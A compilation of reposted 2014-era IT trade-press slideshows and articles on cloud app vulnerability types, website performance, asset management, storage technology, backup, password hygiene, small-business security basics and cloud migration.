Ten Vulnerabilities that Impact Enterprise Cloud Apps

Third-Party Components

Vulnerabilities in third-party components: The widespread use of third-party and open source components in enterprise cloud apps can attract attackers and lead to data exposure. Recent examples include Heartbleed and OpenSSL CCS Injection. Attackers can take advantage this technology to steal enterprise data and read encrypted traffic.


SQL Injections

Vulnerabilities that enable attackers to inject SQL code into an app: Some apps contain vulnerabilities that let attackers inject malicious SQL statements into one of the app’s fields. A successful exploit can have a wide-ranging impact, from attackers being able to escalate privileges in the app to making the app host malware. A recent example of this was in AdRotate, a plugin to popular SaaS app, WordPress.


Database Injections

Vulnerabilities that enable attackers to inject other database code into an app: Even apps that don’t use SQL can suffer from injection attacks. An example of this is the MongoDB Hash Injection, in which the use of Web application framework Ruby on Rails in conjunction with MongoDB can lead to attackers bypassing authentication, exfiltrating data and even launch denial-of-service attacks.


Client-Side Script Injections

Vulnerabilities that enable attackers to inject client-side scripts into the app: Another class of vulnerabilities enables attackers to inject code that is used to lure users to malicious sites or distribute malware to user devices. Common exploits are cross-site scripting (XSS) and iFrame injection. An example of this is the recent XSS vulnerability discovered in Offiria, an open source enterprise social network, which let remote attackers place malicious links in the app.


URL Redirects

Vulnerabilities that lead to URL redirection: Some apps are designed in a way that enables an attacker to get in the middle of the URL path and redirect a user to a different URL. One example is the covert redirect vulnerability in OAuth 2.0 and OpenID, in which an attacker can use the authentication process to redirect users to malicious sites or steal their information.


Disclosure of shared documents

Vulnerabilities that lead to the disclosure of shared documents to unintended recipients: A well-publicized vulnerability involves the “share” function in some cloud storage apps. In it, a user can inadvertently disclose a document to unintended recipients. Major vendors like Dropbox have patched this vulnerability, but others remain unremediated. Given that other app categories like business intelligence, customer relationship management, and software development also enable sharing, this design vulnerability could impact more than just cloud storage apps.

Encrypted and Unencrypted Channels

Vulnerabilities involving the use of both encrypted and unencrypted channels for file movement: Some apps have made a design decision to use an encrypted channel to upload and an unencrypted channel to download files, which can lead to data leakage. An example is the cloud storage app JustCloud, which calls this design out in their terms and conditions. Another example is the use of unencrypted channels by native cloud storage applications in mobile devices such as iPhones and Android devices.


Misconfigured IaaS Access Settings

Vulnerabilities associated with the misconfiguration of infrastructure-as-a-service access settings:Misconfiguring infrastructure as a service can lead to data exposure. An example of this is the misconfiguration of Amazon S3 buckets. A user can easily overlook a key setting, the configuration of the bucket as “public,” which can lead to the public exposure of the contents in the logical container. Since the access configuration applies to the bucket and all of its contents, that exposure can lead to significant data leakage.


IaaS and PaaS Authentication

Vulnerabilities resulting from under-configuring infrastructure- and platform-as-a-service authentication: Organizations that do not take advantage of multi-factor authentication in their infrastructure as a service (IaaS) and platform as a service (Paas) can expose their administration console. An attacker can hijack credentials, which happened to source code hosting provider Code Spaces, ultimately putting the company out of business.


Weak Cryptography

Vulnerabilities resulting from the use of weak cryptography: Most cloud apps use the secure socket layer (SSL) protocol to encrypt communication between user devices and servers. Servers configured with weak encryption can leave apps vulnerable to brute force decryption attacks and data leakage. An example of this is the stream cipher RC4, which can make SSL vulnerable to stream cipher or bit-flipping attacks.


On August 6, Russian hackers announced they had stolen more than one billion usernames and password combinations, along with accompanying email addresses — a big grab, considering that there are nearly three billion Internet users. By that estimation, up to one-third of Internet users may be vulnerable to data loss. The breach is a poignant reminder for individual users and enterprises alike to take a look at how they’re protecting their personally identifiable information (more commonly referred to as PII).

Cisco recently predicted that there will be 21 billion Internet devices in use by 2018, and a recent survey from Netskope  shows that most enterprises use an average of 508 cloud apps across an average of three devices per user. Both of these statistics underscore the dizzying number of usernames, passwords, and email addresses that are used across a myriad of devices and apps, a trend that only looks to continue for the foreseeable future. Organizations today are already relying heavily on cloud apps to help improve productivity and reduce operating costs, and as security standards continue to improve, businesses are becoming increasingly comfortable storing business-critical data in the cloud.

However, with increased popularity comes more attention from malicious hackers trying to access PII and other sensitive data. It’s more critical than ever before to understand how — and where — you’re storing your data, and the variety of vulnerabilities that can exist in the apps in your network.

There are four broad categories of vulnerabilities in cloud apps: components, code, design, and configuration. This slideshow features 10 types of vulnerabilities, identified by Ravi Balupari, senior manager, Cloud Security Research and Content Development at Netskope, that fall into these respective categories, and a brief overview of how they impact enterprise cloud apps.

Source: http://www.itbusinessedge.com/slideshows/ten-vulnerabilities-that-impact-enterprise-cloud-apps.html


How Poor Website Performance Impacts Revenue E-commerce Performance Matters

Abandoned Shopping Carts

If your website takes too long to load, your customers will abandon their shopping carts. In fact, with anything that exceeds six seconds of page load time, you start losing 90 percent of your visitors. Especially in today’s competitive market with customers expecting instantaneous page-load time, your business will truly suffer if your website has slow load time.

Website Crashes

Without a scale-out, fault-tolerant database, your website will not only be unable to handle peaks in traffic, it runs the risk of crashing altogether. If this happens, your customers will surely look elsewhere. Research shows that if your system goes offline, even momentarily, you run the risk of losing them to another vendor.

Loss of Loyal Customers

It’s a simple concept — repeated poor performance leads to customer loss. Even worse than an abandoned shopping cart, lost customer loyalty can really impact the bottom line. Don’t let a faulty database ruin your reputation and ultimately your business.

Unsuccessful Marketing Campaigns

If your website performance is lackluster, then your marketing campaigns cannot be successfully executed. Why? You need customer data to power campaigns. Without customer data for analytics or targeting, customer conversion and new customer acquisition will be nearly impossible, further hurting your bottom line.

Closed Shop

Worst-case scenario — if your website can’t keep up with demand during peak times, then your biggest sales day could become your last. Bottom line, invest in a 100 percent fault-tolerant, scale-out database that will ensure zero downtime and provide your customers with a seamless shopping experience.

Consumer shopping trends are shifting. Online shopping has seen such explosive growth over the last several years that e-commerce is now outpacing the growth of brick-and-mortar businesses. This has fundamentally changed the way that businesses think about performance, both business and website.

In the always-on world of e-commerce, companies pay the price for latency. Amazon found that every 100 milliseconds of downtime cost them one percent in sales and Google found that an extra .5 seconds in search page generation time dropped site traffic by 20 percent. Slow performance affects everything from individual transactions, to customer retention and ultimately revenue. E-commerce businesses simply cannot afford to suffer a slip in performance.

This slideshow features five ways, identified by Clustrix, that performance affects the bottom line, as well as tips on how to ensure they don’t happen to you

Source: http://www.itbusinessedge.com/slideshows/how-poor-website-performance-impacts-revenue.html

Calculating the ROI of IT Asset Management

Initial data collection

The cost for manual data center audits can be high (as much as $15 per asset), even for “readily available” data, which includes equipment manufacturer, model, serial number, name, and location.

Data accuracy

A hidden cost here is the unreliable rate of manual data collection, often between 10 to 15 percent. This affects the audit and can often result in re-audits.

Tracking changes

A large percentage of data center outages, unauthorized changes and mean time to repair (MTTR) data center assets comes from the inability to properly record and track changes manually in the data center – leading to higher audit costs.

Repeat data audits

A similar cost and effort is involved with repeated manual data audits (such as semi-annual or on-demand audits) as with initial data collection efforts.

High cost: Based on these factors and assumptions, it is not unreasonable for data center operators to see costs of up to $60,000 or 20 man weeks around manual data center audits. And, these are proven to be inaccurate.

Lower cost alternative: Based upon the current cost of implementing a typical passive RFID solution in this scenario, the return on investment would be less than 12 months. And, these are proven to be 99.5 percent accurate.


Every data center conducts some type of regular audit. But IT professionals and data center managers may not be aware of the high – and often hidden – costs associated with their manual audits.

The key to the effective and efficient management of an organization’s data center lies with the ability to capture and comprehend a comprehensive picture of what data center assets exists, where each asset is located and how each individual asset is connected to other assets.

As the complexity of a given data center increases – multiple aisles, multiple high-density cabinets, 2- and 4-post racks containing thousands of individual servers and storage devices – the task of capturing asset information becomes increasingly complex. Simple solutions, such as noting serial numbers in static spreadsheets, become less reliable and costly as hundreds of man-hours are spent wandering a data center looking for asset tags.

Data center IT professionals need holistic data center tools that are designed to track infrastructure assets and facilities assets as well. Some examples are RPDUs, PDUs, CRAHs and UPS. Although these items rarely if ever move, they must also be audited and maintained. IT asset management (ITAM) tools must be able to help users to automate and streamline this process. Ultimately, a programmatic approach based in science and using reliable, repeatable and cost-effective tools and systems is the best solution.

In this slideshow, Asset Vue takes a look at four cost points organizations need to consider when determining the ROI of an IT asset management solution.


Source: http://www.itbusinessedge.com/slideshows/calculating-the-roi-of-it-asset-management.html

Holographs, Liquid-State and DNA: The Future of Data Storage

The Advancements

Storing important documents on your local PC has been common practice for years. We’ve seen the technology change drastically in a very short amount of time, and a lot of exciting innovations are on the way. Check out how far we’ve come since IBM first introduced the 960 bit punch card in 1928.


What will the future hold? One possibility is datastickies. Imagine storing your data on a set of sticky notes. The technology intends to replace USB-flash storage by offering something that is cheaper, more convenient and user-friendly.

Datastickies store data from 4 GB to 32 GB on a sliver of graphene between two protective layers. Graphene is a ground-breaking new material that is comprised of tightly packed carbon atoms in a two dimensional honeycomb lattice. It has a minimum thickness of just one atom.

Monitors will need to have a special surface that can interact with the datastickies. Simply stick the post-it note device to an area of the monitor and access the data.

DNA Storage

What started off as a joke turned into reality when two genomicists discussed how appropriate storing data on DNA could be.

Data files are converted into binary code and then into A, T, G, and C code, which stand for the four DNA bases. From these letters, blueprints for the DNA are drawn and the actual strands are created. To the human eye, the completed DNA fragments look like a tiny amount of dust at the bottom of a test tube.

Why is this a step forward? Well, data stored on DNA could be kept intact for thousands of years. Compare this to magnetic tape, which needs to be replaced every five years, and you can see the advantage.

Helium Drive Technology

In 2013, HGST created the first 6 TB 3.5-inch hard drive; apparently, this was made possible by sealing helium gas inside the device.

Helium has one-seventh the density of air, so it dramatically reduces the friction between the spinning disks in the device. As a result, it lowers the electrical power the hard drive consumes and allows more disks to be packed closer together, hence increasing the capacity.

SMR Drives

Seagate claims that Shingled Magnetic Recording (SMR) technology is the first step to reaching a 20 TB hard drive by 2020. SMR involves packing a disk’s tracks closer together; overlapping the tracks allows more data to be written on the same amount of space.

However, despite their larger capacity, SMR drivers suffer from slow data rewrites. As a result of the tracks overlapping, any data that’s already on the track has to be picked up and sequentially rewritten at a later point.

Multi-Cloud Storage

Researchers at IBM are working on a new technology that they like to call “the cloud-of-clouds.” They claim to have developed a service that allows you to move data between multiple cloud platforms in real time.

The multi-cloud distribution storage system links public and private cloud services and is intended to help avoid service outages from the separate providers.

Liquid-State Storage

Instead of storing information in a solid state, metal inside the hard drive is kept in its liquid state. However, the substance isn’t a true liquid metal like mercury or gallium; it’s actually a compound known as vanadium dioxide. It can be given a positive or negative charge and be manipulated to switch between conducting and insulating.

HAMR Drives

Another advancement in hard drive density is heat-assisted magnetic recording (HAMR). In these drives, a tiny laser blasts the surface of the disk platter and heats it up to change its magnetic properties. By doing this, more bits can be stored per square inch and the surface becomes easier to write to.

Seagate puts it in perspective like this: A digital library of all the books written in the world would be approximately 400 TB – in the near future, all these books could conceivably be stored on as few as 20 HAMR devices.

Holographic Storage

Holographic storage is another potential game changer in the world of data storage. Instead of storing the data on the surface of the disk, holographic storage works in three dimensions. DVDs may be able to use multiple layers, but the laser that reads them can only do so from one angle at a time. Holographic technology uses the full depth of the medium and can store data at multiple levels.

The technology offers long-term media stability and a more reliable alternative to discs and tape. Data can be stored securely for just over 50 years.

Cassette Tapes

Surely cassette tapes have had their day? Not according to Sony. The company has recently developed a new magnetic cassette tape that can hold 148 GB per square inch of tape. The new technique uses a type of vacuum-forming called sputter deposition; argon ions are shot at the polymer film to create a layer of fine magnetic crystals with an average size of 7.7 nanometers. However, the re-birth of cassettes isn’t intended to replace Blu-rays and CDs. The tapes are developed for long-term storage of industrial-sized data.


Last year, 2.4 billion people used the cloud for accessing email, social media, games, backup storage and apps. With this figure projected to reach 3.6 billion by 2018, it would appear that cloud computing is here to stay due to our need to store and access ever expanding amounts of data. But the cloud is just the beginning with exciting data storage developments on the horizon.

This slideshow, provided by Ebuyer, depicts how far data storage has evolved since the IBM punch card in 1928 and further analyzes the future of this innovative industry. Datastickies, DNA storage and helium drives are just some of the possibilities for the future of data storage.



Source: http://www.itbusinessedge.com/slideshows/holographs-liquid-state-and-dna-the-future-of-data-storage.html

Five Disruptive Forces Changing the Role of the Systems Integrator

Disruptor No. 1: CFOs seize control as the IT decision makers

Thanks to the cloud, there has been a fundamental shift in power from the chief technology officer (CTO) to the chief financial officer (CFO) in terms of tapping innovative technology to drive business process optimization. CFOs are now key technology decision makers, and innovative SIs need to refocus their approach, skills and offerings on specific solutions that address core business process challenges. These range from unified financial budgeting and planning to effective measurement of business growth.

Disruptor No. 2: Big IT implementations face extinction

Tedious software evaluations and drawn-out implementations are an expensive and unsustainable practice. To compete in today’s dynamic business environment, SIs must move away from large, upfront fees and focus on harnessing new revenue streams from packaged, repeatable solutions. Growth for progressive SIs will increasingly come from selling configurable solutions that address specific cloud-to-cloud or cloud-to-premise implementations and integrations.

Disruptor No. 3: IT budgets go flat

Most companies spend the majority of their IT budgets on maintaining IT systems rather than business innovation. In fact, tight IT budgets are driving businesses to look for agile, proven IT solutions without high upfront costs to fulfill new technology requirements. To ensure their spot in the cloud-era evolution, SIs must become the ongoing IT caretakers and assume traditional IT maintenance responsibilities such as upgrades and integration so that client IT departments can focus more time on innovation. SIs will also need to continuously customize their solutions to meet shifting needs and keep pace with business change.

Disruptor No. 4: IP rules keep changing

IT purchasing behavior has also changed intellectual property (IP) rules. Companies are turning away from $100+M Oracle and SAP implementations and embracing iterative, agile implementations. This shift is opening new SI revenue opportunities. SIs must invest in repeatable IP, turning their deep understanding of unique business processes into products with recurring, repeatable revenue to drive down implementation costs. SIs’ unique IP will become the foundation for sustainable, long-term growth for their business.

Disruptor No. 5: Cloud systems create new silos

The purchasing rules continue to blur as line-of-business leaders now have access to new applications in minutes thanks to cloud technology. This has created another critical business challenge – the rise of cloud-system silos. As businesses clamor to bring together the islands of data now housed in a variety of cloud applications, the top opportunity for SIs in the coming years will be to integrate that data. SIs will be increasingly tasked with bringing all of that disparate data into one central nerve center to drive responsive businesses.

The new SI model for the cloud era

To make the most out of today’s cloud reality, SIs must become partners to the business. Driving the rapid adoption of proven, business-specific solutions that remove cloud silos, SIs will empower IT to reap the rewards of the integrated cloud.

Focusing on IT strategy, flexible design and long-term technology architecture will help their enterprise customers thrive today and better prepare for tomorrow. It’s a brave new cloud, and innovative SIs will be its champions.



The growth of the “integrated enterprise” depends on connecting disparate cloud systems to make them work for today’s dynamic business environment, and innovative systems integrators (SIs) will be the catalyst. The cloud is transforming the SI focus from implementation/customization to long-term business solutions that deliver the agile, future-proof technology roadmaps that today’s C-level executives demand.

Executives from top business consulting firm Armanino and data integration experts from Scribe Software share their take on the five disruptive forces changing the game for leading systems integrators and how they need to evolve to make the most of the new cloud realities.


Source:  http://www.itbusinessedge.com/slideshows/five-disruptive-forces-changing-the-role-of-the-systems-integrator.html

Top Five Epic Fails of Enterprise Endpoint Backup

Retrofitting existing server backup

Server backup vendors have tried to retrofit their own solutions to capture a share of the booming backup market. But this approach almost never succeeds because it doesn’t give organizations what they need; it requires human intervention, is unreliable and doesn’t scale appropriately. Backup needs to happen automatically, transparently and frequently. If business users have to manually initiate or manage the backup of their data, it likely won’t happen.

Restricting/prohibiting data save on endpoints

Some organizations take a completely different approach and opt not to install an endpoint solution at all. Instead, they create policies prohibiting or restricting users from saving data to their laptop or desktop.

Unfortunately, this approach hinges on users changing the fundamental manner in which they work – which effectively guarantees it will not succeed. By employing a safe endpoint backup solution, all endpoint data can be protected without IT admins creating restrictive policies.

Tape-based backup

Some companies attempt to back up endpoint devices to tape, but this approach has many shortcomings. Tapes are a fragile medium, subject to damage from both heat and light exposure. Doing a full restore may require multiple tapes and it could take days simply waiting for the right tapes to arrive.

After a failure, the backup is now the only copy of the data. If an organization only writes backups to tape, and for whatever reason the organization can’t restore from that tape, it will have lost all of its data.

Manual, user-initiated backup to external drives

Surprisingly, many companies still attempt to protect endpoint data by asking or requiring employees to manually back up their data to external drives. This approach can be very costly, especially if the company has thousands of employees purchasing these devices and subsequently charging them back to the company. And once the users obtain the drives, they tend to forget or refuse to back up their devices. Additionally, these drives are frequently lost or stolen, thus compromising the data they were meant to protect. As a best practice, enterprises should keep a minimum of two copies of data backed up in separate locations.

Gluing together different solutions

The last – and most common – approach is trying to leverage multiple existing or disparate technologies to piece together ad-hoc endpoint backup. What usually results is an inconsistent, unreliable tool that doesn’t protect everyone or every platform, and is a nightmare for both users and desktop admins.


Traditionally, “backup” referred to protecting and storing information on a server in an onsite data center. It was a predictable task, and business data lived in a controlled environment that underwent regularly scheduled updates by IT.

Fast forward to today: Enterprises have experienced a major shift in where data lives. Driven by bring your own device (BYOD), the consumerization of IT and a highly mobile workforce, critical enterprise data has moved from the data center to end-user endpoints (and seemingly beyond the reach of IT). The reality is that IT administrators are facing an unpredictable, de-centralized environment in which they have far less control and visibility into what’s happening with enterprise data.

Some have made the shift to the edge successfully, while others have not. In this slideshow, endpoint data protection and management provider Code42 outlines five of the most common mistakes and outdated methods associated with protecting endpoint data.


Source: http://www.itbusinessedge.com/slideshows/top-five-epic-fails-of-enterprise-endpoint-backup.html

Five Steps to Protect Your Passwords Before It’s Too Late

Pay special attention to your email credentials

A lot of users fail to recognize that their email account can be a front door to their entire digital life. Think about how many times you may have reset your password on some other site and the recovery link is sent to your email account. In addition, avoid opening emails from unknown senders and clicking on suspicious email attachments; exercise caution when clicking on enticing links sent through email, instant messages, or posted on social networks; and do not share confidential information when replying to an email.

Change passwords on important sites

It’s a good idea to immediately (and regularly) change passwords for sites that hold a lot of personal information, financial details, and other private data. Cyber criminals who have your credentials could try to use them to access more information on these accounts. This is particularly true if you have used the same password on multiple sites. Attackers will often try to use stolen credentials on multiple sites.

Create stronger passwords

When changing your password, make sure that your new password is a minimum of eight characters long, and that it doesn’t contain your real name, username, or any other personally identifying information. The best passwords include a combination of uppercase and lowercase letters, numbers, and special characters.

Don’t re-use passwords

Once a hacker has your account information and credentials, they’ll try to use it to gain access to all your accounts. This is why it’s important to create a unique password for each account. If you vary your passwords across multiple logins, they won’t be able to access other sites with the same information.

Enable two-factor authentication

Many websites now offer two-factor (or two-step) authentication, which adds an extra layer of security to your account by requiring you to enter your password, plus a code that you will receive on your mobile device via text message or a token generator to login to the site. This may add complexity to the login process, but it significantly improves the security of your account. If nothing else, use this for your most important accounts.


Reports of data breaches, online accounts being hacked and passwords being stolen have become so commonplace, users are no doubt becoming numb and complacent to the real dangers these threats present. Even so, it’s essential that organizations and users take proactive and ongoing action to protect their sensitive information.

For instance, recent reports detail the alleged theft of 1.2 million usernames and passwords by a Russian cyber crime group. While on the surface this appears to be a massive breach, it’s a breach that took time, maybe even years to accomplish. So while it’s important to respond to incidents such as this, it’s just as important – or maybe even more important – to establish strong password best practices that take a proactive rather than reactive approach to dealing with breaches.

In this slideshow, we take a look at five steps, identified by Symantec, that organizations and individual users should take now to protect their most sensitive password-protected information.


Source: http://www.itbusinessedge.com/slideshows/five-steps-to-protect-your-passwords-before-its-too-late.html

Small Business Cybersecurity Readiness Checklist

Small and medium-sized businesses (SMBs), vital to the U.S. economy, are vulnerable when it comes to cybersecurity. Small business owners often make the mistake of thinking that their data will have little value to hackers. Yet, financial accounts and employee, customer or partner information are all appealing to cyber criminals, and if SMBs are unprepared, even more accessible.

The cybersecurity experts over at F-Secure have compiled the following information to help small and medium-sized business owners assess their exposure to cyber threats.

Reference: http://www.itbusinessedge.com/slideshows/small-business-cybersecurity-readiness-checklist.html?utm_source=itbe&utm_medium=email&utm_campaign=FNS&nr=FNS&dni=140488440&rni=13501729

5 security basics your small business should be following

They’re obvious to some, but not everyone takes these precautions.

Over the last year or so, I’ve been covering a number of information security, or infosec, events. And I keep hearing the same two messages. The amount of money being spent on security is increasing. The cost and impact of breaches is increasing even more rapidly.

In other words, were spending more and losing more. What can we do?

If you want to reduce the risk of having your systems accessed by unauthorised parties and mitigate the damage when your systems are breached there are a few things you can do.

1. Don’t open links in email

The word is that the eBay hack that was reported last week started when some eBay staff members were duped into opening links on phishing emails. As a result, their user credentials were captured and the bad guys used that information to access the records of over 140 million eBay users.

2. Use complex passwords

Every year, there’s a report in the papers telling us that “123456” and “password” are still the most common passwords.

Seriously, use complex passwords that use a combination of upper and lower case letters, numbers and symbols.

3. Keep systems up to date

Those security updates that Microsoft, Apple and others release periodically are important. Many of the systems that are breached are attacked through vulnerabilities that the software companies have fixed and issued patches for.

Update your server and desktop systems regularly.

4. It’s not about viruses any more

Most of the attacks made on systems come from compromising people and not systems. Although viruses are still out there, the broader category of malware (a portmanteau of malicious software) includes software that comes from installing dodgy software, accessing dodgy websites and opening untrusted email attachments.

That means your most important line of defence isn’t security software – it’s educating your staff. Remember, prevention is the best cure.

5. Practice your breach procedures

You’ve got some breach procedures written down haven’t you? Things like how to recover data from backups, who to notify if your systems are compromised (customers, suppliers, business partners, service providers) and back up procedures if your IT systems are offline for a few days.

Think about what would happen if your main systems were offline for an hour, day or week and put in place plans for each situation. You might not be able to trade as normal but see if there are ways that will let you keep operating, even if only in a limited way.

The trouble with listening to specific security vendors is that they focus on the problems their solutions solve. But your business needs to think of all the potential risks and actions.

This is where the security industry is letting us down. Their focus is on point solutions. But by looking at how your business runs and how you can work around the loss or compromise of a system you can reduce the risk of your business being crippled if a key system is compromised.
Reference: http://www.bit.com.au/News/386990,5-security-basics-your-small-business-should-be-following.aspx?eid=59&edate=20140530&utm_source=20140530&utm_medium=newsletter&utm_campaign=daily_newsletter&nl=daily

Cloud computing business checklist: Easy migration

For many businesses, cloud computing can seem so simple, yet it can cause massive IT headaches during a transition. You can’t just flip a switch to the cloud – you’ll need a migration plan that factors provider services and security issues.

Here is a checklist to make your cloud computing migration easier:

  1. Align your business goals and processes with the cloud. It’s not enough to tack the cloud on to an existing IT strategy – and business leaders need to oversee the complete process. From IT security to final migration, make sure all hands are on deck.
  2. Know Your SaaS from your IaaS. It’s important to distinguish between renting cloud space with an infrastructure-as-a-service provider, or making a complete overhaul with a software-as-a-service provider.
  3. Audit your data for consistency and clarity. It doesn’t help to transfer outdated or corrupt data into the cloud – you’ll wind up with useless information taking up valuable space.
  4. Choose the applications that make sense for your business. Start with the extraneous and non-mission critical applications, and then gradually make your way to the essential data. Cloud computing migration is a process – don’t move everything all at once.
  5. Choose cloud providers that can scale with your existing IT setups. Vendor lock-in is a huge issue for businesses that have components from multiple providers. Unless you’re looking for a “rip-and-replace” overhaul of your IT infrastructure, you’ll want to find cloud providers that can play well with your legacy setup. You may want to keep certain applications local for security reasons, so factor that into your transition plan.
  6. Build your short and long-term transition plan. Which applications move first? Which ones need more fine tuning? Plot everything out with your cloud provider well before making the move.
  7. Open or closed-source? Enterprises have been wary of the public cloud in recent years, concerned with the perceived lack of security and sustainability. But the public cloud has improved dramatically since then, and are partnering with open-source cloud providers to provide cost-effective solutions.
  8. Test, then test again. Moving to the cloud is a huge procedural and economic step for businesses. Make sure you test for inefficiencies, and prepare to address privacy and security concerns during the move. Use non-critical data to test the capabilities of your new cloud setup.
  9. Identify the standards that govern cloud computing, and make sure your setup abides by them. This cloud standards wiki helps explains the various rules and regulations for cloud operations. Make sure your provider is aware and up to date on them.
  10. Read your Service Level Agreement (SLA) line-by-line. Make specific mention of the intellectual property rights surrounding your data. Who owns the data after the migration?
  11. Go live, keep testing, and ask for feedback. As with any technology rollout, there will be glitches.

Cloud computing has some key benefits for businesses, but not every provider/service can utilize those benefits adequately. Keep this checklist handy to evaluate your company’s unique needs and ease the transition to the cloud.

Reference: http://techpageone.dell.com/technology/cloud-computing-business-checklist-easy-migration/#.UxfKjvmSxDC